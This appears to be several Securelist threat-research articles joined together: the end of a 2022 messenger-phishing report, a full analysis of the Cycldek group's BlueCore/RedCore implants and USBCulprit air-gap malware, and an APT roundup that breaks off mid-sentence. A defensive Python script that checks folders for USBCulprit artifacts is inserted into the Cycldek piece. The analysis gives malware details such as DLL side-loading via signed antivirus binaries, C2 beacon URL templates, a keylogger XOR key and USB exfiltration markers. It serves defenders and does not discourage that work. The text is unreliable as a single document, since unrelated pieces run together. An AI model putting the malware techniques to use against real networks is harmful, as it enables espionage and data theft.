It is notable that the majority of these phishing attacks were aimed at users in Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, from March onward 70–90% of all attempts by Telegram users to follow phishing links were made by Russian users.

### Phishing in messengers

_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._

In 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.

_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_

Phishing activity on WhatsApp was down slightly compared to 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day.
The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)

**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**

The largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place: over the year, the Safe Messaging component prevented 69,000 attempts to go to fraudulent resources from the messenger there.

_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_

Unlike on WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)

**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**

In Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram.
Second place went to Brazil, where 3,800 clicks were blocked.

_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_

## Conclusion

Times of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and the departure of individual companies from specific countries' markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021 but already waning in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.

Recently, we have seen an increase in targeted phishing attacks in which scammers do not move on to the phishing attack itself immediately, but only after several introductory emails in which they actively correspond with the victim. This trend is likely to continue.
New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.

_Source: "Spam and phishing in 2022", Securelist, published 2023-02-16, [securelist.com](<https://securelist.com/spam-phishing-scam-report-2022/108692/>). CVEs referenced: CVE-2017-11882, CVE-2018-0802._

## Key findings

While investigating attacks related to a group named Cycldek after 2018, we were able to uncover various pieces of information about its activities that were not known until now. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi.
Here are some key insights that will be described in this publication:

 * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.
 * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.
 * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.
 * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments, or relies on physical presence for the same purpose.

## Background

Cycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:

 * 2013 - indicators affiliated with the group were found in the network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.
 * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably in Vietnam.
The campaigns made prominent use of Vietnamese-language lure documents delivering commodity malware like PlugX, which was typically leveraged by Chinese-speaking actors.
 * 2017 - the group was seen launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.
 * 2018 - attacks were observed against government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)

**_Figure 1: Timeline of Cycldek-attributed attacks._**

Most attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent to the victims as a phishing email. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:

 * a legitimate signed application, usually related to an AV product, e.g. QcConsol.exe (McAfee's QuickClean utility) or wsc_proxy.exe (Avast's remediation service);
 * a malicious DLL which is side-loaded by the former application;
 * an encrypted binary which gets decrypted and executed by the DLL.

The final payload that is run in memory is malware known as NewCore RAT.
It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.

In the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.

## Two implants, two clusters

When inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and in behavior. At the same time, we noticed differences indicating that the variants could have been used by different operators.

Our analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters.
Notable characteristics of each cluster's implant are summarized in the table below.

| | **BlueCore** | **RedCore** |
|---|---|---|
| Initial infection vector | RTF documents | Unknown |
| Legitimate AV utility | QcConsol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) |
| Side-loaded DLL | QcLite.dll | wsc.dll |
| Payload loader | stdole.tlb: contains PE-loading shellcode and an encrypted BlueCore binary | msgsm64.acm: contains PE-loading shellcode and an encrypted RedCore binary |
| Injected process | dllhst3g.exe | explorer.exe or winlogon.exe |
| Configuration file | %APPDATA%\desktop.ini | C:\Documents and Settings\All Users\Documents\desktop.ini or C:\Documents and Settings\All Users\Documents\desktopWOW64.ini |
| Mutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6}, {F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB}, {E68DFA68-1132-4A32-ADE2-8C87F282C457}, {728264DE-3701-419B-84A4-2AD86B0C43A3}, {2BCD5B61-288C-44D5-BA0D-AAA00E9D2273}, {D9AE3AB0-D123-4F38-A9BE-898C8D49A214} |
| Communicated URL scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s or http://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s |

**_Table 1: Comparison of BlueCore and RedCore loader and implant traits._**

As demonstrated by the table, the variants share similar behavior. For example, both use DLL load-order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities, and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution.
By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)

_**Figure 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore.**_

Moreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)

_**Figure 3: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters.**_

Having said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:

 * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes every 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single byte XOR with the key 0xFA.
 * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks whether the inspected message was sent as a result of a DBT_DEVICEARRIVAL event. Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.
 * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware contacts the C&C and informs it about the connection event.
 * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&C in their original format.

Perhaps the most notable difference between the two implants is the URL scheme they use to connect to and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)

_**Figure 4: Difference in URL scheme used by each implant for C2 communication.**_

The conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)

_**Figure 5: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018.**_

Furthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated with a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both clusters. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix.
All in all, this suggests the entities operating behind those clusters are sharing multiple resources – both code and infrastructure – and operating under a single organizational umbrella.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)

_**Figure 6: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.**_

## Info stealing and lateral movement toolset

During the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools – some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.

As in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Update (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.

As already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (a Sysinternals tool used to dump memory, possibly to obtain passwords from running processes), Nbtscan (a command line utility intended to scan IP networks for NetBIOS information) and PsExec (a Sysinternals tool used to execute commands remotely in the network, typically used for lateral movement).

The rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:

 * **Custom HDoor**: an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool.
   The custom version used by Cycldek uses a small subset of the features, and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.

   [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)

   _**Figure 7: Command line usage of the custom HDoor tool.**_

 * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers.
For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing stolen cookie info. Entries in the file resemble this one:

        {
            "domain": ".google.com",
            "id": 1,
            "name": "NID",
            "path": "/",
            "value": "%VALUE%"
        }

 * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.

   [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)

   _**Figure 8: Command line usage of the ChromePass tool.**_

## Formerly Unreported Malware: USBCulprit

One of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulprit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

During the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated into samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.

Another change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.

This loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro) forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)

_**Figure 9: USBCulprit's loading flow, as observed in samples after 2017.**_

Once USBCulprit is loaded into memory and executed, it operates in three phases:

 * **Bootstrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware. Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with one of the following extensions: `*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf`. Every document found is logged in a file that lists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.

   The chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.

   It is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000', corresponding to 1 June 2016 00:00:00.

 * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection are completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.

   When a USB is connected, the malware will verify whether stolen data should be exfiltrated to it or whether it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' will be searched for in the drive and, if not found, will be created. This directory will be used as the target path for copying files to the drive or the source path for obtaining them from it.

   To understand which direction of file copy should take place, a special marker file named '1.txt' is searched for locally. If it exists, the malware expects to find the aforementioned '$Recyc1e.Bin' directory in the drive with previously stolen document archives and attempts to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.

   [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)

   _**Figure 10: USBCulprit's check for the 1.txt marker, indicating whether stolen files should be copied to the removable drive, or from it.**_

 * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' will be checked locally to decide whether lateral movement should be conducted or not. Only if this file exists will the malware's binary be copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.

   Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples of these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}. Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself based on their behavior. The former is an archive that is extracted to a specific directory that has its files enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.

The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)

_**Figure 11: Commands used to profile the network connectivity of the compromised host.**_

Another explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and that could not be found as artifacts elsewhere in our investigation, points to a human factor being required to assist deployment of the malware in victim networks.

## Conclusion

Cycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.

Furthermore, our analysis of the implants affiliated with the group gives an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. It is also worth noting that we observed multiple instances in which these entities did not work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.

Lastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased – it has merely evolved and changed shape, in terms of malware and actors.
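Because every step of the three phases keys on a fixed file or directory name ('$Recyc1e.Bin', '1.txt', '2.txt', 'time', the two GUID-named extension files and the wrapper.exe/TmDbgLog.dll side-load pair), a responder can check for them directly. The following Python triage script is an added example and not Kaspersky's code: it inspects one directory, either the folder a suspect binary runs from on a host or the root of a mounted removable drive, and reports which of those artifacts are present; the sample tree it builds is constructed for the example.

```python
"""Triage a directory for the USBCulprit artifacts described in the text.

Added example, not code from the report. File and directory names come from the
analysis above; the sample tree built by build_sample_drive() is constructed.
"""
import tempfile
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional

STAGING_DIR = "$Recyc1e.Bin"       # digit '1' mimics the real '$Recycle.Bin'
MARKER_PULL = "1.txt"              # present: archives are copied from the drive to the host
MARKER_SPREAD = "2.txt"            # present: the malware copies itself onto the drive
TIME_FILE = "time"                 # 14-digit YYYYMMDDHHMMSS modification cut-off
DEFAULT_TIME = "20160601000000"    # value written when the 'time' file is missing
EXTENSION_FILES = {
    "{D14030E9-C60C-481E-B7C2-0D76810C6E96}": "archive extracted and run via CUSB::runlist",
    "{D14030E9-C60C-481E-B7C2-0D76810C6E95}": "binary copied to %TEMP% and spawned",
}
SIDELOAD_PAIR = ("wrapper.exe", "TmDbgLog.dll")  # Trend Micro binary + hijacked DLL


def parse_time_file(text: str) -> Optional[datetime]:
    """Parse the collection cut-off; None unless the content is YYYYMMDDHHMMSS."""
    value = text.strip()
    if len(value) != 14 or not value.isdigit():
        return None
    try:
        return datetime.strptime(value, "%Y%m%d%H%M%S")
    except ValueError:  # e.g. month 13
        return None


def _index(directory: Path) -> Dict[str, Path]:
    """Lower-cased name -> path, since FAT/NTFS name lookups are case-insensitive."""
    if not directory.is_dir():
        return {}
    return {p.name.lower(): p for p in directory.iterdir()}


def triage(root: str) -> Dict[str, object]:
    """Report USBCulprit artifacts found directly under root (host folder or drive)."""
    top = _index(Path(root))
    indicators: List[str] = []
    findings: Dict[str, object] = {}

    # Staging directory: holds the encrypted RAR archives going to or from the drive.
    staging = top.get(STAGING_DIR.lower())
    inner: Dict[str, Path] = {}
    if staging is not None and staging.is_dir():
        inner = _index(staging)
        findings["staging_dir"] = str(staging)
        findings["rar_archives"] = sorted(p.name for p in inner.values()
                                          if p.suffix.lower() == ".rar")
        indicators.append("staging directory %s present" % STAGING_DIR)

    # Extension/update modules: looked up by exact GUID name on the drive.
    extensions: Dict[str, str] = {}
    for guid, meaning in EXTENSION_FILES.items():
        if guid.lower() in top or guid.lower() in inner:
            extensions[guid] = meaning
            indicators.append("extension module %s present" % guid)
    findings["extension_files"] = extensions

    # Marker files decide the copy direction and whether the binary spreads.
    findings["pull_marker"] = MARKER_PULL in top
    findings["spread_marker"] = MARKER_SPREAD in top
    if findings["pull_marker"]:
        indicators.append("1.txt: stolen archives are pulled from the drive to this host")
    if findings["spread_marker"]:
        indicators.append("2.txt: the malware binary is copied onto the drive")

    # 'time' file: only documents modified after this timestamp are collected.
    tf = top.get(TIME_FILE)
    if tf is not None and tf.is_file():
        raw = tf.read_text(errors="replace")
        cutoff = parse_time_file(raw)
        findings["time_cutoff"] = cutoff.isoformat() if cutoff else None
        findings["time_is_default"] = raw.strip() == DEFAULT_TIME
        indicators.append("time file present, cut-off %s" % findings["time_cutoff"])

    # Side-load pair of the post-2017 loader chain.
    if all(n.lower() in top for n in SIDELOAD_PAIR):
        findings["sideload_pair"] = list(SIDELOAD_PAIR)
        indicators.append("side-load pair %s + %s present" % SIDELOAD_PAIR)

    findings["indicators"] = indicators
    return findings


def build_sample_drive() -> str:
    """Constructed tree imitating an infected host folder; returns its path."""
    root = Path(tempfile.mkdtemp(prefix="usbculprit_sample_"))
    staging = root / STAGING_DIR
    staging.mkdir()
    (staging / "docs_1.rar").write_bytes(b"Rar!\x1a\x07\x00")  # RAR signature only
    (staging / "{D14030E9-C60C-481E-B7C2-0D76810C6E95}").write_bytes(b"MZ")
    (root / MARKER_SPREAD).write_text("")
    (root / TIME_FILE).write_text(DEFAULT_TIME)
    (root / "wrapper.exe").write_bytes(b"MZ")
    (root / "TmDbgLog.dll").write_bytes(b"MZ")
    return str(root)


if __name__ == "__main__":
    for line in triage(build_sample_drive())["indicators"]:
        print(line)
```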
We continue to track the actor and report on its activity in our Threat Intelligence Portal.

For more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)

### Appendix - IOCs

_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.

_Published 2020-06-03 on Securelist as "Cycldek: Bridging the (air) gap" (<https://securelist.com/cycldek-bridging-the-air-gap/97157/>). CVEs referenced: CVE-2012-0158, CVE-2017-11882, CVE-2018-0802._

## Targeted attacks and malware campaigns

### Mobile espionage targeting the Middle East

At the end of June we reported the details of a highly targeted campaign that we dubbed 'Operation ViceLeaker' involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our [Threat Intelligence Portal](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017.
The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built an open-source legitimate 'Conversations' messenger that included the malicious code. You can read more about Operation ViceLeaker [here](<https://securelist.com/fanning-the-flames-viceleaker-operation/90877/>).

### APT33 beefs up its toolset

In July, we published an update on the 2016-17 activities of [NewsBeef](<https://securelist.com/twas-the-night-before/91599/>) (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with [spear-phishing](<https://encyclopedia.kaspersky.com/glossary/spear-phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) emails, links sent over social media and standalone private messaging applications, and [watering-hole](<https://encyclopedia.kaspersky.com/glossary/watering-hole/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year – tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. Subscribers to our [private intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>) receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.

### New FinSpy iOS and Android implants found in the wild

We recently reported on the [latest versions of FinSpy for Android and iOS](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>). Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. The iOS version doesn't provide infection exploits for its customers and so can only be installed on [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) devices – suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.

### Turla revamps its toolset

Turla (aka Venomous Bear, Uroboros and Waterbug), a high profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset.
Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new .NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The two KopiLuwak analogues – the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan – are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more 